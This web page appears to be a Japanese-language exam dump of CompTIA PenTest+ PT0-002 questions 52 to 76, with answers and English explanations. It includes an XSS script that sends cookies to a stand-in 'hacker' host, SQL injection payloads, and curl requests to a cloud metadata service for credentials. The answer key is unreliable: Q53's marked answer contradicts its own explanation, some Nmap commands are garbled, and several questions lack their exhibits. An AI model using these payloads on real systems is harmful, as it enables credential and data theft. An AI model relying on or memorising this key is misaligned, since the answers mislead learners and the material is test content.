[2024年08月14日]PT0-002日本語認定ガイド問題と解答トレーニング [Q52-Q76]

Share

[2024年08月14日]PT0-002日本語認定ガイド問題と解答トレーニング

PT0-002日本語認定お試しセット最新PT0-002日本語のPDF問題集

質問 # 52
侵入テスターは最近、企業環境内のコア ネットワーク デバイスのセキュリティのレビューを完了しました。主な調査結果は次のとおりです。
* ネットワーク デバイスへの次の要求が傍受されました:
GET /ログイン HTTP/1.1
ホスト: 10.50.100.16
ユーザーエージェント: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 接続: キープアライブ 認証: 基本 WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* ネットワーク管理インターフェイスは、実稼働ネットワークで利用できます。
* Nmap スキャンは以下を返しました:

次のうち、最終レポートの推奨セクションに追加するのに最適なものはどれですか? (2つ選んでください。)

  • A. 認証のためのより良い方法を実装します。
  • B. ネットワーク管理および制御インターフェースを排除します。
  • C. 管理用の帯域外ネットワークを作成します。
  • D. SSH デーモンを無効にするかアップグレードします。
  • E. HTTP/301 リダイレクト構成を無効にします。
  • F. 強化されたパスワードの複雑さの要件を適用します。

正解:C、E


質問 # 53
セキュリティアナリストが192.168 3.3から未知の環境テストを実施中。アナリストは、ペネトレーション テスターのアクティビティの観察を制限し、侵入防御および検出システムによる検出の可能性を低くしたいと考えています。この目的を達成するために、アナリストは次の Nmap コマンドのうちどれを使用する必要がありますか?

  • A. Nmap -F 192.168.5.5
  • B. マップ -scanflags SYNFIN 192.168.5.5
  • C. マップ -datalength 2.192.168.5.5
  • D. Nmap -D 10.5.2.2.168.5.5

正解:B

解説:
To limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems, the security analyst should use the Nmap -D 10.5.2.2
192.168.3.3 command 1. The -D option is used to conceal the identity of the attacker by using decoy IP addresses. This option can be used to confuse the IDS/IPS and lower the probability of detection 1.
References: 1: CompTIA. (2021). CompTIA PenTest+ Certification Exam Objectives. Retrieved from
https://www.comptia.org/content/dam/comptia/documents/certifications/Exam%20Objectives/CompTIA-PenTes


質問 # 54
侵入テスターは、インターネットに接続されたネットワーク デバイスで -F オプションを使用して Nmap スキャンを実行し、いくつかの開いているポートを見つけました。さらに列挙するために、テスターは次のコマンドを使用して別のスキャンを実行しました。
nmap -O -A -sS -p- 100.100.100.50
Nmap は、65,535 個のポートすべてがフィルタリングされたことを返しました。次のうち、2 回目のスキャンで発生した可能性が最も高いのはどれですか?

  • A. スキャンは ICMP エコー応答を返しました。
  • B. 侵入テスターがサポートされていないフラグを使用しました。
  • C. ファイアウォールまたは IPS がスキャンをブロックしました。
  • D. エッジ ネットワーク デバイスが切断されました。

正解:C


質問 # 55
組織は、安全性の低いプロトコルがワイヤレス ネットワークで使用されているかどうかを特定したいと考えています。
この目的を達成できるのは、次のタイプの攻撃のうちどれですか?

  • A. プロトコルネゴシエーション
  • B. パケットスニッフィング
  • C. 4ウェイハンドシェイク
  • D. ダウングレード攻撃

正解:D

解説:
Explanation
A downgrade attack is a type of attack that exploits a vulnerability in the protocol negotiation process between a client and a server to force them to use a less secure protocol than they originally intended. A downgrade attack can be used to identify whether a less secure protocol is being utilized on a wireless network by intercepting and modifying the messages exchanged during the protocol negotiation phase, such as the association request and response frames, and making the client and the server agree on a weaker protocol, such as WEP or WPA, instead of a stronger one, such as WPA2 or WPA3. A downgrade attack can also enable the attacker to perform other attacks, such as cracking the encryption keys or capturing the network traffic, more easily by taking advantage of the weaknesses of the less secure protocol. A downgrade attack can be performed by using tools such as Airgeddon, which is a multi-use bash script for Linux systems to audit wireless networks1.


質問 # 56
クライアントのペネトレーション テスト サービスの価格を計算する際に考慮すべき最も重要な側面は次のうちどれですか?

  • A. クライアントの予算
  • B. 必要な作業範囲
  • C. 機密保持契約
  • D. 運用コスト

正解:B

解説:
When calculating the price of a penetration test service for a client, the most important aspect to consider is the required scope of work 1. The scope of work defines the objectives of the penetration test and the systems that will be tested. It is important to understand the scope of work to determine the resources required to complete the test and the time it will take to complete the test 2.
References: 2: CompTIA. (2021). CompTIA PenTest+ Certification Exam Objectives. Retrieved from
https://www.comptia.org/content/dam/comptia/documents/certifications/Exam%20Objectives/CompTIA-PenTes O'Brien, D. (2021). The Official CompTIA PenTest+ Study Guide (Exam PT0-002). John Wiley & Sons.


質問 # 57
セキュリティ会社は、侵入テストの結果についてクライアントと話し合っています。調査結果に基づいて、クライアントは残りの時間を重要なネットワーク セグメントに集中させたいと考えています。次のうち、行われているアクションを最もよく表しているのはどれですか?

  • A. クライアント環境へのリスクを軽減する
  • B. 誤検知の可能性を排除する
  • C. 目標/目的の再優先順位付け
  • D. 脆弱性を発見する可能性を最大化する

正解:C

解説:
Goal Reprioritization ▪ Have the goals of the assessment changed? ▪ Has any new information been found that might affect the goal or desired end state? I would also agree with A, because by goal reprioritization you are more likely to find vulnerabilities in this specific segment of critical network, but it is a side effect of goal reprioritization.


質問 # 58
契約前、契約中、契約後に提供された情報をどのように管理するかを規定するために、侵入テスターとクライアントの間で署名する必要がある文書は次のうちどれですか?

  • A. 秘密保持契約
  • B. ROE
  • C. MSA
  • D. SOW

正解:A


質問 # 59
侵入テスト担当者は、侵入テストの最後にトラックをクリーンアップしてカバーしています。テスターがシステムから確実に取り外す必要があるのは、次のうちどれですか? (2つ選んでください。)

  • A. ARP キャッシュ
  • B. 作成されたユーザー アカウント
  • C. サーバーログ
  • D. スポーンされたシェル
  • E. 管理者アカウント
  • F. システムを再起動します

正解:B、D

解説:
Removing shells: Remove any shell programs installed when performing
the pentest.
Removing tester-created credentials: Be sure to remove any user accounts
created during the pentest. This includes backdoor accounts.
Removing tools: Remove any software tools that were installed on the
customer's systems that were used to aid in the exploitation of systems.


質問 # 60
侵入テスターは、Google での検索を特定のドメインに制限しようとしています。侵入テスト担当者が考慮すべきコマンドは次のうちどれですか?

  • A. リンク:
  • B. サイト:
  • C. URL:
  • D. インタイトル:

正解:B


質問 # 61
赤いチームのテスターは、企業のネットワーク上の悪意のあるインサイダーによってもたらされる脅威をエミュレートするように契約されており、機密の個人ファイルにアクセスするという制約された目的があります。評価中に、レッドチームのテスターは、ターゲット環境内での以前の侵害の可能性を示すアーティファクトを特定します。
テスターが取るべきアクションは次のうちどれですか?

  • A. 評価を続行する前に、調査結果の詳細なドキュメントを作成します。
  • B. 新たに特定された侵害の方法を、レッド チームのアプローチに組み込みます。
  • C. 評価を中止し、契約に記載されている報告手順に従います。
  • D. フォレンジック分析を実行して、侵害の手段を分離し、帰属を特定します。

正解:C


質問 # 62
侵入テストを行うために、セキュリティ エンジニアは IT ヘルプ デスクになりすます。セキュリティ エンジニアは、ユーザーへのパスワード変更の緊急リクエストと次のリンクを含むフィッシングメールを送信します。
https://example.com/index.html。エンジニアは、ユーザーが資格情報を入力すると、index.html ページが資格情報を取得し、セキュリティ エンジニアが制御している別のサーバーに転送するように攻撃を設計しました。次の情報があるとします。

攻撃を成功させるために、セキュリティ エンジニアは次のコード行のうちどれを追加する必要がありますか?

  • A. window.location.= 'https://evilcorp.com'
  • B. geturlparameter ('username')
  • C. redirectUrl = 'https://example.com'
  • D. crossDomain: true

正解:D


質問 # 63
次の出力は、一般向けの銀行 Web サイトでの偵察からのものです。

これらの結果に基づいて、成功する可能性が最も高い攻撃は次のうちどれですか?

  • A. セッション チケット拡張に対する攻撃 (Ticketbleed)
  • B. 64 ビット暗号 (Sweet32) に対する誕生日攻撃
  • C. ハートブリード攻撃
  • D. RC4 暗号を破る攻撃

正解:C

解説:
Based on these results, the most likely attack to succeed is a Heartbleed attack. The Heartbleed attack is a vulnerability in the OpenSSL implementation of the TLS/SSL protocol that allows an attacker to read the memory of the server and potentially steal sensitive information, such as private keys, passwords, or session tokens. The results show that the website is using OpenSSL 1.0.1f, which is vulnerable to the Heartbleed attack1.


質問 # 64
赤いチームはエンゲージメントを完了し、レポートで次の例を提供して、チームが Web サーバーへのアクセスを取得した方法を説明しました。
x' OR role LIKE '%admin%
この脆弱性を修正するために、次のうちどれを推奨する必要がありますか?

  • A. 多要素認証
  • B. 安全なソフトウェア開発ライフサイクル
  • C. パラメータ化されたクエリ
  • D. 暗号化通信

正解:C

解説:
The best recommendation to remediate this vulnerability is to use parameterized queries in the web application. Parameterized queries are a way of preventing SQL injection attacks by separating the SQL statements from the user input. This way, the user input is treated as a literal value and not as part of the SQL statement. For example, instead of using x' OR role LIKE '%admin%, the user input would be passed as a parameter to a prepared statement that would check if it matches any value in the database.


質問 # 65
次のコードがあるとします。
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
この種の攻撃を防ぐための最良の方法は次のうちどれですか? (2つ選んでください。)

  • A. パラメータ化されたクエリ
  • B. セッション トークン
  • C. Base64 エンコーディング
  • D. 出力エンコーディング
  • E. 入力の検証
  • F. Web アプリケーション ファイアウォール

正解:D、E

解説:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
Output encoding and input validation are two of the best methods to prevent against this type of attack, which is known as cross-site scripting (XSS).
Output encoding is a technique that converts user-supplied input into a safe format that prevents malicious scripts from being executed by browsers or applications.
Input validation is a technique that checks user-supplied input against a set of rules or filters that reject any invalid or malicious data.
Web-application firewall is a device or software that monitors and blocks web traffic based on predefined rules or signatures, but it may not catch all XSS attacks.
Parameterized queries are a technique that separates user input from SQL statements to prevent SQL injection attacks, but they do not prevent XSS attacks.
Session tokens are values that are used to maintain state and identify users across web requests, but they do not prevent XSS attacks.
Base64 encoding is a technique that converts binary data into ASCII characters for transmission or storage purposes, but it does not prevent XSS attacks.


質問 # 66
企業組織との契約を準備する際に、侵入テスト活動を開始する前に完全に開発する必要がある最も重要な項目の 1 つは、次のうちどれですか?

  • A. すべての利害関係者にインタビューします。
  • B. 作業明細書を明確にします。
  • C. クライアントから資産インベントリを取得します。
  • D. 関係するすべての第三者を特定します。

正解:B

解説:
Clarifying the statement of work is one of the most important items to develop fully prior to beginning the penetration testing activities, as it defines the scope, objectives, deliverables, and expectations of the engagement. The statement of work is a formal document that outlines the agreement between the penetration tester and the client and serves as a reference for both parties throughout the engagement. It should include details such as the type, duration, and frequency of testing, the target systems and networks, the authorized methods and tools, the reporting format and schedule, and any legal or ethical considerations.


質問 # 67
次のプロトコルまたはテクノロジーのうち、最終的なセキュリティ評価レポートを電子メールで送信するための転送中の機密性保護を提供するのはどれですか?

  • A. FTPS
  • B. AS2
  • C. S/MIME
  • D. DNSSEC

正解:C

解説:
S/MIME stands for Secure/Multipurpose Internet Mail Extensions and is a standard for encrypting and signing email messages. It uses public key cryptography to ensure the confidentiality, integrity, and authenticity of email communications. FTPS is a protocol for transferring files securely over SSL/TLS, but it is not used for emailing. DNSSEC is a protocol for securing DNS records, but it does not protect email content. AS2 is a protocol for exchanging business documents over HTTP/S, but it is not used for emailing.


質問 # 68
侵入テスターは、営業時間外にクライアントの建物に侵入しようとするために、承認された物理的な侵入テストを実施しています。侵入テスターがテスト中に持つべき最も重要なものは次のうちどれですか? (2つ選んでください。)

  • A. 建物の通常の営業時間に関する知識
  • B. 危険箇所をマーキングするための注意テープ
  • C. マスクと個人用保護具
  • D. ハンドヘルド RF スペクトラム アナライザー
  • E. クライアントの専用窓口
  • F. エンゲージメントを文書化する書類

正解:E、F

解説:
Always carry the contact information and any documents stating that you are approved to do this.


質問 # 69
侵入テスターは、ワイヤレス セキュリティを確認するために契約されています。テスターは、ターゲットのエンタープライズ WiFi の構成を模倣する悪意のあるワイヤレス AP を展開しました。侵入テスターは、近くのワイヤレス ステーションを強制的に悪意のある AP に接続させようとしています。テスターが次に取るべきステップはどれですか?

  • A. 2.4GHz と 5GHz のすべてのチャネルでジャミングを実行します。
  • B. 悪意のある AP の構成を変更して、事前共有キーを使用しないようにします。
  • C. 動的周波数選択チャネル内でブロードキャストするように悪意のある AP を設定します。
  • D. 認証解除フレームをステーションに送信します。

正解:D

解説:
https://steemit.com/informatica/@jordiurbina1/tutorial-hacking-wi-fi-wireless-networks-with-wifislax The penetration tester should send deauthentication frames to the stations to force them to disconnect from their current access point and reconnect to another one, which may be the malicious AP deployed by the tester. Deauthentication frames are part of the 802.11 protocol and are used to terminate an existing wireless association between a station and an access point. However, they can also be spoofed by an attacker to disrupt or hijack wireless connections. The other options are not effective or relevant for this purpose. Performing jamming on all 2.4GHz and 5GHz channels would interfere with all wireless signals in the area, which may cause unwanted attention or legal issues. Setting the malicious AP to broadcast within dynamic frequency selection channels would not help, as these channels are used to avoid interference with radar systems and are not commonly used by wireless stations or access points. Modifying the malicious AP configuration to not use a pre-shared key would not help, as it would make it less likely for wireless stations to connect to it if they are configured to use encryption.


質問 # 70
評価中に、ペネトレーション テスターがログを検査し、単一の IP アドレスから同じ URL に送信される一連の数千のリクエストを発見しました。ご要望の一部を以下に挙げます。

攻撃者が悪用しようとしたのは次の脆弱性のうちどれですか?

  • A. ..SQL インジェクション
  • B. ..URL操作
  • C. ..安全でない直接オブジェクト参照
  • D. ..セッションハイジャック

正解:A

解説:
The vulnerability that the attacker was trying to exploit is SQL injection, which is a type of attack that exploits a vulnerability in a web application that allows an attacker to execute malicious SQL statements on a database server. SQL injection can allow an attacker to perform various actions on the database, such as reading, modifying, deleting, or creating data, or executing commands on the underlying OS. The log shows that the attacker was sending thousands of requests to the same URL with different parameters, such as id=1' OR 1=1;-, id=1' AND 1=2;-, or id=1' UNION SELECT * FROM users;-. These parameters are examples of SQL injection payloads, which are crafted SQL statements that are designed to manipulate or bypass the intended SQL query. For example, id=1' OR 1=1;-- is a payload that terminates the original query with a single quote and a semicolon, appends an OR condition that is always true (1=1), and comments out the rest of the query with two dashes (-). This payload can cause the web application to return all records from the database table instead of just one record with id=1. The other options are not vulnerabilities that match the log entries. Session hijacking is a type of attack that exploits a vulnerability in a web application that allows an attacker to take over an active session of another user by stealing or guessing their session identifier or cookie. URL manipulation is a type of attack that exploits a vulnerability in a web application that allows an attacker to modify parameters or values in the URL to access unauthorized resources or functions. Insecure direct object reference is a type of attack that exploits a vulnerability in a web application that allows an attacker to access objects or resources directly by modifying their identifiers or references in the URL or request.


質問 # 71
侵入テスターは、特権ユーザーのパスワードが 30 の異なる Linux システムで同じである可能性があるという兆候を発見しました。テスト担当者がパスワードを使用できるシステムの数を特定するのに役立つツールは次のうちどれですか?

  • A. カインとアベル
  • B. メデューサ
  • C. ヒドラ
  • D. ジョン・ザ・リッパー

正解:B

解説:
Explanation
Both Hydra and Medusa can be used for that same purpose:
THC Hydra is a brute-force cracking tool for remote authentication services. It supports many protocols, including telnet, FTP, LDAP, SSH, SNMP, and others.
Medusa is a Parallel, Modular and Speedy method for brute-force which issued for remote authentication. Following are the applications and protocols like modular design, Thread based parallel testing and flexible user input and protocols are AFP, CVS, FTP, HTTP, IMAP etc.


質問 # 72
PCI DSS では、侵入テスト プロセスの一部として次のどれを要求しますか?

  • A. ペネトレーション テスターはサイバーセキュリティ認定を取得している必要があります。
  • B. 評価は勤務時間外に実行する必要があります。
  • C. 外部に面したシステムのみをテストする必要があります。
  • D. ネットワークはセグメント化されている必要があります。

正解:D


質問 # 73
侵入テスト会社は、同じ顧客に対して 6 か月ごとに評価を実行します。最新の評価のためにネットワーク スキャンを実行しているときに、ペネトレーション テスターは、ターゲット ホストのいくつかが、その地域の大手テレビおよび ISP に関連する住宅用接続であるように見えることを観察しました。この観察の理由として最も可能性が高いのは次のうちどれですか?

  • A. ペネトレーション テスターがネットワーク スキャナーを誤って構成しました。
  • B. ネットワーク スキャン アクティビティがファイアウォールによってブロックされています。
  • C. ネットワーク スキャン ツールが正しく機能していません。
  • D. IP 範囲の所有権が変更されました。

正解:D

解説:
When a penetration tester notices several target hosts appearing to be residential connections associated with a major television and ISP, it's likely that the IP ranges initially assigned to the target organization have changed ownership and are now allocated to the ISP for residential use. This can happen due to reallocation of IP addresses by regional internet registries. Misconfiguration of the scanner (option A), malfunctioning of scanning tools (option B), or firewall blocking (option D) would not typically result in the discovery of residential connections in place of expected organizational targets.


質問 # 74
ペネトレーション テスターは次の Nmap コマンドを実行し、次の出力を取得します。

次のコマンドのうち、ペネトレーション テスターが悪用可能なサービスを発見するのに最も役立つものはどれですか?
A)

B)

C)

D)

  • A. nmap -v -p 25 -- soript smtp-enum-users リモートホスト
  • B. nmap -v -- script=mysql-info.nse リモートホスト
  • C. nmap --ocript=omb-brute.noe Remotehoat
  • D. nmap -p 3306 -- スクリプト "http*vuln*" リモートホスト

正解:B

解説:
The Nmap command in the question scans all ports on the remote host and identifies the services and versions running on them. The output shows that port 3306 is open and running MariaDB, which is a fork of MySQL.
Therefore, the best command to discover an exploitable service would be to use the mysql-info.nse script, which gathers information about the MySQL server, such as the version, user accounts, databases, and configuration variables. The other commands are either misspelled, irrelevant, or too broad for the task. References: Best PenTest+ certification study resources and training materials, CompTIA PenTest+ PT0-002 Cert Guide, 101 Labs - CompTIA PenTest+: Hands-on Labs for the PT0-002 Exam


質問 # 75
システムに侵入した後、ペネトレーションテスターは、次にどのようなアクションを実行するかを決定するために、より多くの情報を必要とします。テスターは次のコマンドを実行します。

ペネトレーションテスターが実行しようとしている可能性が最も高い攻撃は次のうちどれですか?

  • A. コンテナ脱出テクニック
  • B. リソース枯渇
  • C. メタデータ サービス攻撃
  • D. 資格情報の収集

正解:C

解説:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to perform.


質問 # 76
......

ベストCompTIA PT0-002日本語学習ガイドと問題集は2024:https://jp.fast2test.com/PT0-002J-premium-file.html


弊社を連絡する

我々は12時間以内ですべてのお問い合わせを答えます。

我々の働いている時間: ( GMT 0:00-15:00 )
月曜日から土曜日まで

サポート: 現在連絡 

English Deutsch 繁体中文 한국어